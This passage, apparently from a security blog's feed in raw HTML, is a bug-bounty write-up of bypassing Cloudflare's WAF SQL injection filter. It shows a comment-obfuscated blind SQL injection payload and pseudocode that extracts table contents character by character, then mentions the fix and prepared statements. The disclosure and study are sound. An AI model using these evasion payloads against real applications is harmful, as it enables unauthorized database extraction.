class="k">SUBSTRING</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span><span class="cm">/*trick comment*/</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">table_name</span> <span class="o">=</span> <span class="nv">"t1"</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <p>The above injection is in its final form and when passed as a form value to the vulnerable web application the web server will reply with a 200 OK if the character ‘a’ matches the first character of the first column’s name of table t1.</p> <h4 id="full-speed-ahead">Full Speed Ahead</h4> <p>To make the retrieving of table contents from the application’s database easier I wrote a script in Python to automate the process. The pseudocode of the script goes something like this:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># assert names of columns and table name is known </span><span class="n">alphabet</span> <span class="o">=</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="n">c</span><span class="p">,...,</span><span class="n">y</span><span class="p">,</span><span class="n">z</span><span class="p">]</span> <span class="n">characterPosition</span> <span class="o">=</span> <span class="mi">1</span> <span class="c1"># the position of the character we are bruteforcing </span><span class="k">for</span> <span class="n">rowNumber</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="mi">20</span><span class="p">]:</span> <span class="k">for</span> <span class="n">columnName</span> <span class="ow">in</span> <span class="n">columns</span><span class="p">:</span> <span class="k">for</span> <span class="n">character</span> <span class="ow">in</span> <span class="n">alphabet</span><span class="p">:</span> <span class="n">sqlInjection</span> <span class="o">=</span> <span class="s">''' 0x{hex_encode(character)} LIKE ( SELECT/*trick comment*/ SUBSTRING({columnName}, characterPosition,1) FROM/*trick comment*/ tableName LIMIT {rowNumber}, 1 ) '''</span> <span class="n">inject</span> <span class="n">sqlInjection</span> <span class="ow">is</span> <span class="n">POST</span> <span class="n">request</span> <span class="n">body</span> <span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="n">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> <span class="n">result</span> <span class="o">+=</span> <span class="n">character</span> <span class="n">recurse</span> <span class="n">function</span> <span class="k">with</span> <span class="n">characterPosition</span><span class="o">++</span> <span class="k">elif</span> <span class="n">response</span><span class="p">.</span><span class="n">status</span> <span class="o">==</span> <span class="mi">500</span><span class="p">:</span> <span class="k">continue</span> <span class="k">with</span> <span class="nb">next</span> <span class="n">character</span> <span class="ow">in</span> <span class="n">alphabet</span> <span class="k">return</span> <span class="n">result</span></code></pre></figure> <p>And this is how I bypassed Cloudflare WAF’s SQL injection protection. I got a free t-shirt and a place in <a href="https://hackerone.com/gskourou">Cloudflare’s HoF</a>.</p> <h4 id="mitigation">Mitigation</h4> <p>Cloudlfare reviewed and fixed the vulnerability a few days after my report.</p> <p>The safest way to mitigate SQL injections on your databases is prepared statements. These come in most database interaction libraries for most languages. You can find a full list of ways to mitigate SQL injections at <a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">OWASP</a>. It is my opinion that if developers take good care to apply security measures on their applications, WAFs are most of the times unnecessary. All you need to do is sanitize the users’ input properly.</p> Fri, 04 Sep 2020 10:37:00 +0000 /web/2020/09/04/how-i-bypassed-cloudflares-sql-injection-filter.html /web/2020/09/04/how-i-bypassed-cloudflares-sql-injection-filter.html Web